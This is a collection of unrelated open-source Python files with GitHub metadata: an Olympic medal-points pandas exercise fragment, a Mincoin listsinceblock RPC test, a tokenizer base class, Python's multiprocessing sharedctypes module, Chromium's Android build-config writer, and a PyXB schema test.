gold = [13, 11, 10, 9, 8, 8, 6, 5, 4, 4, 4, 3, 3, 2, 2, 2, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
silver = [11, 5, 10, 7, 7, 6, 3, 0, 8, 4, 1, 4, 3, 7, 4, 2, 4, 3, 1, 0, 0, 2, 2, 2, 1, 0]
bronze = [9, 10, 5, 12, 9, 5, 2, 1, 5, 7, 1, 2, 2, 6, 2, 4, 3, 1, 2, 1, 0, 6, 2, 1, 0, 1]
# YOUR CODE HERE
olympic_medal_counts = {'country_name': countries,
'gold': Series(gold),
'silver': Series(silver),
'bronze': Series(bronze)}
df = DataFrame(olympic_medal_counts)
medal_counts = df[['gold','silver','bronze']]
points = numpy.dot(medal_counts, [4,2,1])
olympic_points = {'country_name': countries,
'points': Series(points)}
return DataFrame(olympic_points)
print(numpy_dot() == a_dot()) | {
"content_hash": "7daf8bde25e3ea1a8dcf3c8f4b60fa09",
"timestamp": "",
"source": "github",
"line_count": 87,
"max_line_length": 155,
"avg_line_length": 44.701149425287355,
"alnum_prop": 0.5626124967858062,
"repo_name": "kinshuk4/MoocX",
"id": "8b3281d9b8cca4c532f418c1a59c82462f06207e",
"size": "3889",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "k2e/dev/libs/python/numpy-and-pandas/olympic_medal_points.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "60646"
},
{
"name": "HTML",
"bytes": "441"
},
{
"name": "Jupyter Notebook",
"bytes": "17094788"
},
{
"name": "Makefile",
"bytes": "399"
},
{
"name": "Mathematica",
"bytes": "43985"
},
{
"name": "PHP",
"bytes": "9480"
},
{
"name": "Python",
"bytes": "511555"
},
{
"name": "Shell",
"bytes": "8678"
},
{
"name": "Swift",
"bytes": "972"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import MincoinTestFramework
from test_framework.util import assert_equal
class ListSinceBlockTest (MincoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
def run_test (self):
'''
`listsinceblock` did not behave correctly when handed a block that was
no longer in the main chain:
ab0
/ \
aa1 [tx0] bb1
| |
aa2 bb2
| |
aa3 bb3
|
bb4
Consider a client that has only seen block `aa3` above. It asks the node
to `listsinceblock aa3`. But at some point prior the main chain switched
to the bb chain.
Previously: listsinceblock would find height=4 for block aa3 and compare
this to height=5 for the tip of the chain (bb4). It would then return
results restricted to bb3-bb4.
Now: listsinceblock finds the fork at ab0 and returns results in the
range bb1-bb4.
This test only checks that [tx0] is present.
'''
assert_equal(self.is_network_split, False)
self.nodes[2].generate(101)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 500)
assert_equal(self.nodes[3].getbalance(), 0)
# Split network into two
self.split_network()
assert_equal(self.is_network_split, True)
# send to nodes[0] from nodes[2]
senttx = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 1)
# generate on both sides
lastblockhash = self.nodes[1].generate(6)[5]
self.nodes[2].generate(7)
print('lastblockhash=%s' % (lastblockhash))
self.sync_all()
self.join_network()
# listsinceblock(lastblockhash) should now include tx, as seen from nodes[0]
lsbres = self.nodes[0].listsinceblock(lastblockhash)
found = False
for tx in lsbres['transactions']:
if tx['txid'] == senttx:
found = True
break
assert_equal(found, True)
if __name__ == '__main__':
ListSinceBlockTest().main()
| {
"content_hash": "bdfe3b1ab5b8fd02811b0456d5642c16",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 84,
"avg_line_length": 31.506666666666668,
"alnum_prop": 0.5780787134997885,
"repo_name": "mincoin-project/mincoin",
"id": "21c9be5fec9003b0d7cae99de84ec5425cd5ef12",
"size": "2627",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/listsinceblock.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "650854"
},
{
"name": "C++",
"bytes": "4577982"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "174531"
},
{
"name": "Makefile",
"bytes": "102845"
},
{
"name": "Objective-C",
"bytes": "6702"
},
{
"name": "Objective-C++",
"bytes": "7229"
},
{
"name": "Python",
"bytes": "882269"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Roff",
"bytes": "3788"
},
{
"name": "Shell",
"bytes": "34265"
}
],
"symlink_target": ""
} |
class Tokenizer(object):
"""The root class for tokenizers.
Args:
return_set (boolean): A flag to indicate whether to return a set of
tokens instead of a bag of tokens (defaults to False).
Attributes:
return_set (boolean): An attribute to store the flag return_set.
"""
def __init__(self, return_set=False):
self.return_set = return_set
def get_return_set(self):
"""Gets the value of the return_set flag.
Returns:
The boolean value of the return_set flag.
"""
return self.return_set
def set_return_set(self, return_set):
"""Sets the value of the return_set flag.
Args:
return_set (boolean): a flag to indicate whether to return a set of tokens instead of a bag of tokens.
"""
self.return_set = return_set
return True
| {
"content_hash": "96c880c48736a0f27202c8dda65bd0ac",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 114,
"avg_line_length": 31.3,
"alnum_prop": 0.5654952076677316,
"repo_name": "kvpradap/conda-pysm-appveyor",
"id": "36b96b780f548a8ff3aa04b02e5efa61961d181f",
"size": "939",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "py_stringmatching/tokenizer/tokenizer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "4050"
},
{
"name": "CSS",
"bytes": "6599"
},
{
"name": "HTML",
"bytes": "802454"
},
{
"name": "JavaScript",
"bytes": "23105"
},
{
"name": "Jupyter Notebook",
"bytes": "2323"
},
{
"name": "PowerShell",
"bytes": "6223"
},
{
"name": "Python",
"bytes": "203911"
},
{
"name": "Shell",
"bytes": "578"
}
],
"symlink_target": ""
} |
import sys
import ctypes
import weakref
from multiprocessing import heap, RLock
from multiprocessing.forking import assert_spawning, ForkingPickler
__all__ = ['RawValue', 'RawArray', 'Value', 'Array', 'copy', 'synchronized']
#
#
#
typecode_to_type = {
'c': ctypes.c_char, 'u': ctypes.c_wchar,
'b': ctypes.c_byte, 'B': ctypes.c_ubyte,
'h': ctypes.c_short, 'H': ctypes.c_ushort,
'i': ctypes.c_int, 'I': ctypes.c_uint,
'l': ctypes.c_long, 'L': ctypes.c_ulong,
'f': ctypes.c_float, 'd': ctypes.c_double
}
#
#
#
def _new_value(type_):
size = ctypes.sizeof(type_)
wrapper = heap.BufferWrapper(size)
return rebuild_ctype(type_, wrapper, None)
def RawValue(typecode_or_type, *args):
'''
Returns a ctypes object allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
obj.__init__(*args)
return obj
def RawArray(typecode_or_type, size_or_initializer):
'''
Returns a ctypes array allocated from shared memory
'''
type_ = typecode_to_type.get(typecode_or_type, typecode_or_type)
if isinstance(size_or_initializer, (int, long)):
type_ = type_ * size_or_initializer
obj = _new_value(type_)
ctypes.memset(ctypes.addressof(obj), 0, ctypes.sizeof(obj))
return obj
else:
type_ = type_ * len(size_or_initializer)
result = _new_value(type_)
result.__init__(*size_or_initializer)
return result
def Value(typecode_or_type, *args, **kwds):
'''
Return a synchronization wrapper for a Value
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawValue(typecode_or_type, *args)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def Array(typecode_or_type, size_or_initializer, **kwds):
'''
Return a synchronization wrapper for a RawArray
'''
lock = kwds.pop('lock', None)
if kwds:
raise ValueError('unrecognized keyword argument(s): %s' % kwds.keys())
obj = RawArray(typecode_or_type, size_or_initializer)
if lock is False:
return obj
if lock in (True, None):
lock = RLock()
if not hasattr(lock, 'acquire'):
raise AttributeError("'%r' has no method 'acquire'" % lock)
return synchronized(obj, lock)
def copy(obj):
new_obj = _new_value(type(obj))
ctypes.pointer(new_obj)[0] = obj
return new_obj
def synchronized(obj, lock=None):
assert not isinstance(obj, SynchronizedBase), 'object already synchronized'
if isinstance(obj, ctypes._SimpleCData):
return Synchronized(obj, lock)
elif isinstance(obj, ctypes.Array):
if obj._type_ is ctypes.c_char:
return SynchronizedString(obj, lock)
return SynchronizedArray(obj, lock)
else:
cls = type(obj)
try:
scls = class_cache[cls]
except KeyError:
names = [field[0] for field in cls._fields_]
d = dict((name, make_property(name)) for name in names)
classname = 'Synchronized' + cls.__name__
scls = class_cache[cls] = type(classname, (SynchronizedBase,), d)
return scls(obj, lock)
#
# Functions for pickling/unpickling
#
def reduce_ctype(obj):
assert_spawning(obj)
if isinstance(obj, ctypes.Array):
return rebuild_ctype, (obj._type_, obj._wrapper, obj._length_)
else:
return rebuild_ctype, (type(obj), obj._wrapper, None)
def rebuild_ctype(type_, wrapper, length):
if length is not None:
type_ = type_ * length
ForkingPickler.register(type_, reduce_ctype)
obj = type_.from_address(wrapper.get_address())
obj._wrapper = wrapper
return obj
#
# Function to create properties
#
def make_property(name):
try:
return prop_cache[name]
except KeyError:
d = {}
exec template % ((name,)*7) in d
prop_cache[name] = d[name]
return d[name]
template = '''
def get%s(self):
self.acquire()
try:
return self._obj.%s
finally:
self.release()
def set%s(self, value):
self.acquire()
try:
self._obj.%s = value
finally:
self.release()
%s = property(get%s, set%s)
'''
prop_cache = {}
class_cache = weakref.WeakKeyDictionary()
#
# Synchronized wrappers
#
class SynchronizedBase(object):
def __init__(self, obj, lock=None):
self._obj = obj
self._lock = lock or RLock()
self.acquire = self._lock.acquire
self.release = self._lock.release
def __reduce__(self):
assert_spawning(self)
return synchronized, (self._obj, self._lock)
def get_obj(self):
return self._obj
def get_lock(self):
return self._lock
def __repr__(self):
return '<%s wrapper for %s>' % (type(self).__name__, self._obj)
class Synchronized(SynchronizedBase):
value = make_property('value')
class SynchronizedArray(SynchronizedBase):
def __len__(self):
return len(self._obj)
def __getitem__(self, i):
self.acquire()
try:
return self._obj[i]
finally:
self.release()
def __setitem__(self, i, value):
self.acquire()
try:
self._obj[i] = value
finally:
self.release()
def __getslice__(self, start, stop):
self.acquire()
try:
return self._obj[start:stop]
finally:
self.release()
def __setslice__(self, start, stop, values):
self.acquire()
try:
self._obj[start:stop] = values
finally:
self.release()
class SynchronizedString(SynchronizedArray):
value = make_property('value')
raw = make_property('raw')
| {
"content_hash": "a47cb302382f72aa7ab43cf92da09d6d",
"timestamp": "",
"source": "github",
"line_count": 233,
"max_line_length": 79,
"avg_line_length": 27.042918454935624,
"alnum_prop": 0.5768925567370259,
"repo_name": "kleientertainment/ds_mod_tools",
"id": "b6a8d7fa4256fcf4f6dffce30dbaf30d780e46e9",
"size": "7963",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "pkg/win32/Python27/Lib/multiprocessing/sharedctypes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "51"
},
{
"name": "C",
"bytes": "10931"
},
{
"name": "C++",
"bytes": "437813"
},
{
"name": "Lua",
"bytes": "9787"
},
{
"name": "Python",
"bytes": "8021665"
},
{
"name": "Shell",
"bytes": "41"
}
],
"symlink_target": ""
} |
"""Writes a build_config file.
The build_config file for a target is a json file containing information about
how to build that target based on the target's dependencies. This includes
things like: the javac classpath, the list of android resources dependencies,
etc. It also includes the information needed to create the build_config for
other targets that depend on that one.
Android build scripts should not refer to the build_config directly, and the
build specification should instead pass information in using the special
file-arg syntax (see build_utils.py:ExpandFileArgs). That syntax allows passing
of values in a json dict in a file and looks like this:
--python-arg=@FileArg(build_config_path:javac:classpath)
Note: If paths to input files are passed in this way, it is important that:
1. inputs/deps of the action ensure that the files are available the first
time the action runs.
2. Either (a) or (b)
a. inputs/deps ensure that the action runs whenever one of the files changes
b. the files are added to the action's depfile
"""
import itertools
import optparse
import os
import sys
import xml.dom.minidom
from util import build_utils
from util import md5_check
import write_ordered_libraries
# Types that should never be used as a dependency of another build config.
_ROOT_TYPES = ('android_apk', 'deps_dex', 'java_binary', 'resource_rewriter')
# Types that should not allow code deps to pass through.
_RESOURCE_TYPES = ('android_assets', 'android_resources')
class AndroidManifest(object):
def __init__(self, path):
self.path = path
dom = xml.dom.minidom.parse(path)
manifests = dom.getElementsByTagName('manifest')
assert len(manifests) == 1
self.manifest = manifests[0]
def GetInstrumentation(self):
instrumentation_els = self.manifest.getElementsByTagName('instrumentation')
if len(instrumentation_els) == 0:
return None
if len(instrumentation_els) != 1:
raise Exception(
'More than one <instrumentation> element found in %s' % self.path)
return instrumentation_els[0]
def CheckInstrumentation(self, expected_package):
instr = self.GetInstrumentation()
if not instr:
raise Exception('No <instrumentation> elements found in %s' % self.path)
instrumented_package = instr.getAttributeNS(
'http://schemas.android.com/apk/res/android', 'targetPackage')
if instrumented_package != expected_package:
raise Exception(
'Wrong instrumented package. Expected %s, got %s'
% (expected_package, instrumented_package))
def GetPackageName(self):
return self.manifest.getAttribute('package')
dep_config_cache = {}
def GetDepConfig(path):
if not path in dep_config_cache:
dep_config_cache[path] = build_utils.ReadJson(path)['deps_info']
return dep_config_cache[path]
def DepsOfType(wanted_type, configs):
return [c for c in configs if c['type'] == wanted_type]
def GetAllDepsConfigsInOrder(deps_config_paths):
def GetDeps(path):
return set(GetDepConfig(path)['deps_configs'])
return build_utils.GetSortedTransitiveDependencies(deps_config_paths, GetDeps)
def ResolveGroups(configs):
while True:
groups = DepsOfType('group', configs)
if not groups:
return configs
for config in groups:
index = configs.index(config)
expanded_configs = [GetDepConfig(p) for p in config['deps_configs']]
configs[index:index + 1] = expanded_configs
class Deps(object):
def __init__(self, direct_deps_config_paths):
self.all_deps_config_paths = GetAllDepsConfigsInOrder(
direct_deps_config_paths)
self.direct_deps_configs = ResolveGroups(
[GetDepConfig(p) for p in direct_deps_config_paths])
self.all_deps_configs = [
GetDepConfig(p) for p in self.all_deps_config_paths]
self.direct_deps_config_paths = direct_deps_config_paths
def All(self, wanted_type=None):
if type is None:
return self.all_deps_configs
return DepsOfType(wanted_type, self.all_deps_configs)
def Direct(self, wanted_type=None):
if wanted_type is None:
return self.direct_deps_configs
return DepsOfType(wanted_type, self.direct_deps_configs)
def AllConfigPaths(self):
return self.all_deps_config_paths
def RemoveNonDirectDep(self, path):
if path in self.direct_deps_config_paths:
raise Exception('Cannot remove direct dep.')
self.all_deps_config_paths.remove(path)
self.all_deps_configs.remove(GetDepConfig(path))
def _MergeAssets(all_assets):
"""Merges all assets from the given deps.
Returns:
A tuple of lists: (compressed, uncompressed)
Each tuple entry is a list of "srcPath:zipPath". srcPath is the path of the
asset to add, and zipPath is the location within the zip (excluding assets/
prefix)
"""
compressed = {}
uncompressed = {}
for asset_dep in all_assets:
entry = asset_dep['assets']
disable_compression = entry.get('disable_compression', False)
dest_map = uncompressed if disable_compression else compressed
other_map = compressed if disable_compression else uncompressed
outputs = entry.get('outputs', [])
for src, dest in itertools.izip_longest(entry['sources'], outputs):
if not dest:
dest = os.path.basename(src)
# Merge so that each path shows up in only one of the lists, and that
# deps of the same target override previous ones.
other_map.pop(dest, 0)
dest_map[dest] = src
def create_list(asset_map):
ret = ['%s:%s' % (src, dest) for dest, src in asset_map.iteritems()]
# Sort to ensure deterministic ordering.
ret.sort()
return ret
return create_list(compressed), create_list(uncompressed)
def _FilterUnwantedDepsPaths(dep_paths, target_type):
# Don't allow root targets to be considered as a dep.
ret = [p for p in dep_paths if GetDepConfig(p)['type'] not in _ROOT_TYPES]
# Don't allow java libraries to cross through assets/resources.
if target_type in _RESOURCE_TYPES:
ret = [p for p in ret if GetDepConfig(p)['type'] in _RESOURCE_TYPES]
return ret
def main(argv):
parser = optparse.OptionParser()
build_utils.AddDepfileOption(parser)
parser.add_option('--build-config', help='Path to build_config output.')
parser.add_option(
'--type',
help='Type of this target (e.g. android_library).')
parser.add_option(
'--possible-deps-configs',
help='List of paths for dependency\'s build_config files. Some '
'dependencies may not write build_config files. Missing build_config '
'files are handled differently based on the type of this target.')
# android_resources options
parser.add_option('--srcjar', help='Path to target\'s resources srcjar.')
parser.add_option('--resources-zip', help='Path to target\'s resources zip.')
parser.add_option('--r-text', help='Path to target\'s R.txt file.')
parser.add_option('--package-name',
help='Java package name for these resources.')
parser.add_option('--android-manifest', help='Path to android manifest.')
parser.add_option('--is-locale-resource', action='store_true',
help='Whether it is locale resource.')
# android_assets options
parser.add_option('--asset-sources', help='List of asset sources.')
parser.add_option('--asset-renaming-sources',
help='List of asset sources with custom destinations.')
parser.add_option('--asset-renaming-destinations',
help='List of asset custom destinations.')
parser.add_option('--disable-asset-compression', action='store_true',
help='Whether to disable asset compression.')
# java library options
parser.add_option('--jar-path', help='Path to target\'s jar output.')
parser.add_option('--supports-android', action='store_true',
help='Whether this library supports running on the Android platform.')
parser.add_option('--requires-android', action='store_true',
help='Whether this library requires running on the Android platform.')
parser.add_option('--bypass-platform-checks', action='store_true',
help='Bypass checks for support/require Android platform.')
# android library options
parser.add_option('--dex-path', help='Path to target\'s dex output.')
# native library options
parser.add_option('--native-libs', help='List of top-level native libs.')
parser.add_option('--readelf-path', help='Path to toolchain\'s readelf.')
# apk options
parser.add_option('--apk-path', help='Path to the target\'s apk output.')
parser.add_option('--incremental-apk-path',
help="Path to the target's incremental apk output.")
parser.add_option('--incremental-install-script-path',
help="Path to the target's generated incremental install "
"script.")
parser.add_option('--tested-apk-config',
help='Path to the build config of the tested apk (for an instrumentation '
'test apk).')
parser.add_option('--proguard-enabled', action='store_true',
help='Whether proguard is enabled for this apk.')
parser.add_option('--proguard-info',
help='Path to the proguard .info output for this apk.')
parser.add_option('--has-alternative-locale-resource', action='store_true',
help='Whether there is alternative-locale-resource in direct deps')
options, args = parser.parse_args(argv)
if args:
parser.error('No positional arguments should be given.')
required_options_map = {
'java_binary': ['build_config', 'jar_path'],
'java_library': ['build_config', 'jar_path'],
'android_assets': ['build_config'],
'android_resources': ['build_config', 'resources_zip'],
'android_apk': ['build_config', 'jar_path', 'dex_path', 'resources_zip'],
'deps_dex': ['build_config', 'dex_path'],
'resource_rewriter': ['build_config'],
'group': ['build_config'],
}
required_options = required_options_map.get(options.type)
if not required_options:
raise Exception('Unknown type: <%s>' % options.type)
if options.native_libs:
required_options.append('readelf_path')
build_utils.CheckOptions(options, parser, required_options)
if options.type == 'java_library':
if options.supports_android and not options.dex_path:
raise Exception('java_library that supports Android requires a dex path.')
if options.requires_android and not options.supports_android:
raise Exception(
'--supports-android is required when using --requires-android')
possible_deps_config_paths = build_utils.ParseGypList(
options.possible_deps_configs)
allow_unknown_deps = (options.type in
('android_apk', 'android_assets', 'android_resources'))
unknown_deps = [
c for c in possible_deps_config_paths if not os.path.exists(c)]
if unknown_deps and not allow_unknown_deps:
raise Exception('Unknown deps: ' + str(unknown_deps))
direct_deps_config_paths = [
c for c in possible_deps_config_paths if not c in unknown_deps]
direct_deps_config_paths = _FilterUnwantedDepsPaths(direct_deps_config_paths,
options.type)
deps = Deps(direct_deps_config_paths)
# Remove other locale resources if there is alternative_locale_resource in
# direct deps.
if options.has_alternative_locale_resource:
alternative = [r['path'] for r in deps.Direct('android_resources')
if r.get('is_locale_resource')]
# We can only have one locale resources in direct deps.
if len(alternative) != 1:
raise Exception('The number of locale resource in direct deps is wrong %d'
% len(alternative))
unwanted = [r['path'] for r in deps.All('android_resources')
if r.get('is_locale_resource') and r['path'] not in alternative]
for p in unwanted:
deps.RemoveNonDirectDep(p)
direct_library_deps = deps.Direct('java_library')
all_library_deps = deps.All('java_library')
direct_resources_deps = deps.Direct('android_resources')
all_resources_deps = deps.All('android_resources')
# Resources should be ordered with the highest-level dependency first so that
# overrides are done correctly.
all_resources_deps.reverse()
if options.type == 'android_apk' and options.tested_apk_config:
tested_apk_deps = Deps([options.tested_apk_config])
tested_apk_resources_deps = tested_apk_deps.All('android_resources')
all_resources_deps = [
d for d in all_resources_deps if not d in tested_apk_resources_deps]
# Initialize some common config.
config = {
'deps_info': {
'name': os.path.basename(options.build_config),
'path': options.build_config,
'type': options.type,
'deps_configs': direct_deps_config_paths
}
}
deps_info = config['deps_info']
if (options.type in ('java_binary', 'java_library') and
not options.bypass_platform_checks):
deps_info['requires_android'] = options.requires_android
deps_info['supports_android'] = options.supports_android
deps_require_android = (all_resources_deps +
[d['name'] for d in all_library_deps if d['requires_android']])
deps_not_support_android = (
[d['name'] for d in all_library_deps if not d['supports_android']])
if deps_require_android and not options.requires_android:
raise Exception('Some deps require building for the Android platform: ' +
str(deps_require_android))
if deps_not_support_android and options.supports_android:
raise Exception('Not all deps support the Android platform: ' +
str(deps_not_support_android))
if options.type in ('java_binary', 'java_library', 'android_apk'):
javac_classpath = [c['jar_path'] for c in direct_library_deps]
java_full_classpath = [c['jar_path'] for c in all_library_deps]
deps_info['resources_deps'] = [c['path'] for c in all_resources_deps]
deps_info['jar_path'] = options.jar_path
if options.type == 'android_apk' or options.supports_android:
deps_info['dex_path'] = options.dex_path
if options.type == 'android_apk':
deps_info['apk_path'] = options.apk_path
deps_info['incremental_apk_path'] = options.incremental_apk_path
deps_info['incremental_install_script_path'] = (
options.incremental_install_script_path)
# Classpath values filled in below (after applying tested_apk_config).
config['javac'] = {}
if options.type in ('java_binary', 'java_library'):
# Only resources might have srcjars (normal srcjar targets are listed in
# srcjar_deps). A resource's srcjar contains the R.java file for those
# resources, and (like Android's default build system) we allow a library to
# refer to the resources in any of its dependents.
config['javac']['srcjars'] = [
c['srcjar'] for c in direct_resources_deps if 'srcjar' in c]
if options.type == 'android_apk':
# Apks will get their resources srcjar explicitly passed to the java step.
config['javac']['srcjars'] = []
if options.type == 'android_assets':
all_asset_sources = []
if options.asset_renaming_sources:
all_asset_sources.extend(
build_utils.ParseGypList(options.asset_renaming_sources))
if options.asset_sources:
all_asset_sources.extend(build_utils.ParseGypList(options.asset_sources))
deps_info['assets'] = {
'sources': all_asset_sources
}
if options.asset_renaming_destinations:
deps_info['assets']['outputs'] = (
build_utils.ParseGypList(options.asset_renaming_destinations))
if options.disable_asset_compression:
deps_info['assets']['disable_compression'] = True
if options.type == 'android_resources':
deps_info['resources_zip'] = options.resources_zip
if options.srcjar:
deps_info['srcjar'] = options.srcjar
if options.android_manifest:
manifest = AndroidManifest(options.android_manifest)
deps_info['package_name'] = manifest.GetPackageName()
if options.package_name:
deps_info['package_name'] = options.package_name
if options.r_text:
deps_info['r_text'] = options.r_text
if options.is_locale_resource:
deps_info['is_locale_resource'] = True
if options.type in ('android_resources','android_apk', 'resource_rewriter'):
config['resources'] = {}
config['resources']['dependency_zips'] = [
c['resources_zip'] for c in all_resources_deps]
config['resources']['extra_package_names'] = []
config['resources']['extra_r_text_files'] = []
if options.type == 'android_apk' or options.type == 'resource_rewriter':
config['resources']['extra_package_names'] = [
c['package_name'] for c in all_resources_deps if 'package_name' in c]
config['resources']['extra_r_text_files'] = [
c['r_text'] for c in all_resources_deps if 'r_text' in c]
if options.type in ['android_apk', 'deps_dex']:
deps_dex_files = [c['dex_path'] for c in all_library_deps]
proguard_enabled = options.proguard_enabled
if options.type == 'android_apk':
deps_info['proguard_enabled'] = proguard_enabled
if proguard_enabled:
deps_info['proguard_info'] = options.proguard_info
config['proguard'] = {}
proguard_config = config['proguard']
proguard_config['input_paths'] = [options.jar_path] + java_full_classpath
# An instrumentation test apk should exclude the dex files that are in the apk
# under test.
if options.type == 'android_apk' and options.tested_apk_config:
tested_apk_library_deps = tested_apk_deps.All('java_library')
tested_apk_deps_dex_files = [c['dex_path'] for c in tested_apk_library_deps]
# Include in the classpath classes that are added directly to the apk under
# test (those that are not a part of a java_library).
tested_apk_config = GetDepConfig(options.tested_apk_config)
javac_classpath.append(tested_apk_config['jar_path'])
# Exclude dex files from the test apk that exist within the apk under test.
deps_dex_files = [
p for p in deps_dex_files if not p in tested_apk_deps_dex_files]
expected_tested_package = tested_apk_config['package_name']
AndroidManifest(options.android_manifest).CheckInstrumentation(
expected_tested_package)
if tested_apk_config['proguard_enabled']:
assert proguard_enabled, ('proguard must be enabled for instrumentation'
' apks if it\'s enabled for the tested apk')
# Dependencies for the final dex file of an apk or a 'deps_dex'.
if options.type in ['android_apk', 'deps_dex']:
config['final_dex'] = {}
dex_config = config['final_dex']
dex_config['dependency_dex_files'] = deps_dex_files
if options.type in ('java_binary', 'java_library', 'android_apk'):
config['javac']['classpath'] = javac_classpath
config['java'] = {
'full_classpath': java_full_classpath
}
if options.type == 'android_apk':
config['dist_jar'] = {
'dependency_jars': [
c['jar_path'] for c in all_library_deps
]
}
manifest = AndroidManifest(options.android_manifest)
deps_info['package_name'] = manifest.GetPackageName()
if not options.tested_apk_config and manifest.GetInstrumentation():
# This must then have instrumentation only for itself.
manifest.CheckInstrumentation(manifest.GetPackageName())
library_paths = []
java_libraries_list_holder = [None]
libraries = build_utils.ParseGypList(options.native_libs or '[]')
if libraries:
def recompute_ordered_libraries():
libraries_dir = os.path.dirname(libraries[0])
write_ordered_libraries.SetReadelfPath(options.readelf_path)
write_ordered_libraries.SetLibraryDirs([libraries_dir])
all_deps = (
write_ordered_libraries.GetSortedTransitiveDependenciesForBinaries(
libraries))
# Create a java literal array with the "base" library names:
# e.g. libfoo.so -> foo
java_libraries_list_holder[0] = ('{%s}' % ','.join(
['"%s"' % s[3:-3] for s in all_deps]))
library_paths.extend(
write_ordered_libraries.FullLibraryPath(x) for x in all_deps)
# This step takes about 600ms on a z620 for chrome_apk, so it's worth
# caching.
md5_check.CallAndRecordIfStale(
recompute_ordered_libraries,
record_path=options.build_config + '.nativelibs.md5.stamp',
input_paths=libraries,
output_paths=[options.build_config])
if not library_paths:
prev_config = build_utils.ReadJson(options.build_config)
java_libraries_list_holder[0] = (
prev_config['native']['java_libraries_list'])
library_paths.extend(prev_config['native']['libraries'])
config['native'] = {
'libraries': library_paths,
'java_libraries_list': java_libraries_list_holder[0],
}
config['assets'], config['uncompressed_assets'] = (
_MergeAssets(deps.All('android_assets')))
build_utils.WriteJson(config, options.build_config, only_if_changed=True)
if options.depfile:
build_utils.WriteDepfile(
options.depfile,
deps.AllConfigPaths() + build_utils.GetPythonDependencies())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| {
"content_hash": "81d61a8e8a2026378b9cb9f334139dc6",
"timestamp": "",
"source": "github",
"line_count": 524,
"max_line_length": 80,
"avg_line_length": 40.538167938931295,
"alnum_prop": 0.6805385556915544,
"repo_name": "highweb-project/highweb-webcl-html5spec",
"id": "baa535db6848fa78a9f283e847c6fb00f8fe968c",
"size": "21429",
"binary": false,
"copies": "3",
"ref": "refs/heads/highweb-20160310",
"path": "build/android/gyp/write_build_config.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import pyxb.binding.generate
import pyxb.utils.domutils
import os.path
schema_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../schemas/test-include-dau.xsd'))
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
#open('code.py', 'w').write(code)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
class TestIncludeDD (unittest.TestCase):
def setUp (self):
self.__basis_log = logging.getLogger('pyxb.binding.basis')
self.__basis_loglevel = self.__basis_log.level
def tearDown (self):
self.__basis_log.level = self.__basis_loglevel
def testDefault (self):
xmls = '<entry xmlns="%s"><from>one</from><to>single</to></entry>' % (Namespace.uri(),)
# Default namespace applies to from which should be in no namespace
# Hide the warning from pyxb.binding.basis.complexTypeDefinition.append
# that it couldn't convert the DOM node to a binding.
self.__basis_log.setLevel(logging.ERROR)
self.assertRaises(pyxb.UnrecognizedContentError, CreateFromDocument, xmls.encode('utf-8'))
def testExplicit (self):
xmls = '<ns:entry xmlns:ns="%s"><from>one</from><ns:to>single</ns:to></ns:entry>' % (Namespace.uri(),)
instance = CreateFromDocument(xmls.encode('utf-8'))
self.assertEqual(english.one, instance.from_)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "054ee530a43f97d2b5612faf25842ac6",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 110,
"avg_line_length": 36.73809523809524,
"alnum_prop": 0.6694750486066104,
"repo_name": "balanced/PyXB",
"id": "b4297186756484a08140ccff24f588080b47df5b",
"size": "1567",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tests/drivers/test-include-dau.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Perl",
"bytes": "6286"
},
{
"name": "Python",
"bytes": "1854695"
},
{
"name": "Shell",
"bytes": "37524"
}
],
"symlink_target": ""
} |
__author__ = 'spencertank'
| {
"content_hash": "f60d9d459d5db76be6c4d91ae6f84323",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 26,
"avg_line_length": 27,
"alnum_prop": 0.6296296296296297,
"repo_name": "SEL-Columbia/commcare-hq",
"id": "ae0e3b8b88ece0f7fd57ef6c59aa1396b7618360",
"size": "27",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "corehq/apps/orgs/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "15950"
},
{
"name": "CSS",
"bytes": "768322"
},
{
"name": "JavaScript",
"bytes": "2647080"
},
{
"name": "Python",
"bytes": "7806659"
},
{
"name": "Shell",
"bytes": "28569"
}
],
"symlink_target": ""
} |
